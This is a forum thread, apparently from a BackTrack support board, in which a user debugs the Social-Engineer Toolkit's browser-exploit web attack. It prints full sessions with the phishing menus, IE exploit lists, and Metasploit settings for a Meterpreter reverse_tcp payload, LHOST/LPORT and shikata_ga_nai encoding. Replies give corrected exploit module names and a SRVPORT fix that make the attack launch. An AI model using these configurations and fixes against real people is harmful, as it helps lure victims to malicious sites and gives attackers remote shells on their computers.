Results 1 to 10 of 10

Thread: Social Engineering Toolkit Error

  1. #1
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Social Engineering Toolkit Error

    Well here are the steps I did that caused the error:
    Code:
      [---]       The Social-Engineer Toolkit (SET)          [---]
      [---]         Written by David Kennedy (ReL1K)         [---]
      [---]                 Version: 0.4.1                   [---]
      [---]      Codename: 'Rise of the Pink Pirate'         [---]
      [---]     Report bugs to: davek@social-engineer.org    [---]
      [---]      Check out: http://social-engineer.org       [---]
      [---]        Homepage: http://www.secmaniac.com        [---]
      [---] Tutorial: http://offsec.com/metasploit-unleashed [---]
      [---]      Unpublished Java Applet by: Thomas Werth    [---]
    
    Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Select from the menu on what you would like to do:
    
    1. Spear-Phishing (Email) Attacks
    2. Website Attack Vectors
    3. Update the Metasploit Framework
    4. Update the Social-Engineer Toolkit
    5. Create a Payload and Listener
    6. Help, Credits, and About
    7. Exit the Social-Engineer Toolkit
    
    Enter your choice: 2
    
    The Social-Engineer Toolkit "Web Attack" will create a
    fake "professional" looking website for you with malicious
    java applet code or utilize iframes with Metasploit payloads.
    When you entice a victim to the website either through
    social-engineering, a XSS vulnerability, arp cache poisioning,
    E-Mail, or other options.
    
    The payload can either be something you specify or
    dynamically through the Metasploit framework.
    
    A new addition is the ability to clone a website. SET will
    allow you to clone a website you specify and automatically
    inject the java applet attack or browser exploit into the
    site.
    
    This can be useful if you want to make a website look
    similar to a company that you are doing a penetration
    testing on and want the site to look and feel like their
    own. It's currently experimental. Please email any issues
    to rel1k@backtrack-linux.org
    
    Website Attack Vectors
    
    1. Let SET create a website for you
    2. Clone and setup a fake website
    3. Import your own website
    4. Return to main menu.
    
    Enter number (1-4): 1
    
    Enter what type of attack you would like to utilize.
    
    The Java Applet attack will spoof a Java Certificate and
    delivery a metasploit based payload.
    
    The Metasploit browser exploit method will utilize select
    Metasploit browser exploits through an iframe and deliver
    a Metasploit payload.
    
    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Return to the previous menu.
    
    Enter your choice (press enter for default): 2
    
    Enter the browser exploit you would like to use
    
    1. Microsoft Internet Explorer iepeers.dll Use After Free (Zero-Day)
    2. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
    3. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
    4. Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
    5. Internet Explorer isComponentInstalled Overflow
    6. Internet Explorer Explorer Data Binding Corruption (MS08-078)
    7. Internet Explorer Winhlp32.exe MsgBox F1 (User has to hit F1)
    8. Internet Explorer Unsafe Scripting Misconfiguration
    9. FireFox 3.5 escape Return Value Memory Corruption
    
    Enter your choice (1-6): 2
    What payload do you want to generate:
    
    Name:                                      Description:
    
    1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
    5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
    6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
    7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
    
    Enter choice (example 1-7): 2
    
    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************
    
      [--] Tested on IE6, IE7, IE8 and FireFox [--]
    [*] Launching MSF Listener...[*] This may take a few to load MSF...[*] Don't tase me bro!
    
                    __.                       .__.        .__. __.
      _____   _____/  |______    ____________ |  |   ____ |__|/  |_
     /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
    |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
    |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
          \/     \/          \/     \/ |__|
    
    
           =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
    + -- --=[ 540 exploits - 256 auxiliary
    + -- --=[ 207 payloads - 23 encoders - 8 nops
           =[ svn r9043 updated today (2010.04.08)
    
    resource (src/program_junk/meta_config)> use windows/browser/ie_aurora
    [-] Failed to load module: windows/browser/ie_aurora
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 192.168.99.146
    LHOST => 192.168.99.146
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
    ENCODING => shikata_ga_nai
    resource (src/program_junk/meta_config)> set URIPATH /
    URIPATH => /
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [-] Unknown command: exploit.
    msf >

  2. #2
    Member MosGuy's Avatar
    Join Date
    Jan 2010
    Location
    Ontario, Canada
    Posts
    120

    Default Re: Social Engineering Toolkit Error

    I left my mind-reading hat in the other room. What error would that be, is there a question somewhere here ?

  3. #3
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: Social Engineering Toolkit Error

    did you look at it carefully?

    [-] Failed to load module: windows/browser/ie_aurora
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    Last edited by joker5bb; 04-09-2010 at 02:23 AM.

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: Social Engineering Toolkit Error

    Are you sure thats Backtrack 4 final?

  5. #5
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: Social Engineering Toolkit Error

    yes its backtrack 4 final, i updated the social engineering toolkit and metasploit
    by pressing 3 and 4 in the main menu

    FireFox 3.5 escape Return Value Memory Corruption works fine
    options 1 and 2 fail so far for the IE

    I think it could be metasploit

    there is also a typo when it asks for: Enter the browser exploit you would like to use
    it says: Enter your choice (1-6):
    but it has to be 1-9
    Last edited by joker5bb; 04-09-2010 at 02:59 AM.

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: Social Engineering Toolkit Error

    I'll notify the author to check it out.

  7. #7
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: Social Engineering Toolkit Error

    I found the FIX!

    with the latest revision of metasploit exploits got renamed
    Code:
    use windows/browser/ie_aurora
    has to be changed to:
    Code:
    use windows/browser/ms10_002_aurora
    SET has to be updated
    Last edited by joker5bb; 04-09-2010 at 03:43 AM.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default Re: Social Engineering Toolkit Error

    Fixed, svn update, thanks!

  9. #9
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: Social Engineering Toolkit Error

    more problems:

    Code:
    resource (src/program_junk/meta_config)> use windows/browser/ie_iepeers_pointer
    [-] Failed to load module: windows/browser/ie_iepeers_pointer
    it has to be
    Code:
    use windows/browser/ms10_018_ie_behaviors
    then we need to set SRVPORT 80 here:
    Code:
    resource (src/program_junk/meta_config)> use windows/browser/ie_winhlp32
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 192.168.99.146
    LHOST => 192.168.99.146
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
    ENCODING => shikata_ga_nai
    resource (src/program_junk/meta_config)> set URIPATH /
    URIPATH => /
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    [*] Started reverse handler on 192.168.99.146:443
    [-] Exploit failed: Using WebDAV requires SRVPORT=80 and URIPATH=/
    msf exploit(1mie_winhlp32) >
    Last edited by joker5bb; 04-10-2010 at 02:12 PM.

  10. #10
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default Re: Social Engineering Toolkit Error

    This one is fixed also, its primarily due to MSF changing the names of the exploits when they get released under a official name (i.e. ms10-018), its to be expected

Similar Threads

  1. Social Engineering Toolkit --- Acceso a un sistema con SET
    By šĜrτĦacK in forum BT Videos - ES
    Replies: 11
    Last Post: 02-18-2011, 03:57 AM
  2. Replies: 66
    Last Post: 11-25-2010, 04:17 PM
  3. Replies: 0
    Last Post: 02-11-2010, 02:06 AM
  4. probleme social engineering toolkit 0.3
    By CX4STORM in forum Beginners Forum
    Replies: 1
    Last Post: 01-25-2010, 04:59 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •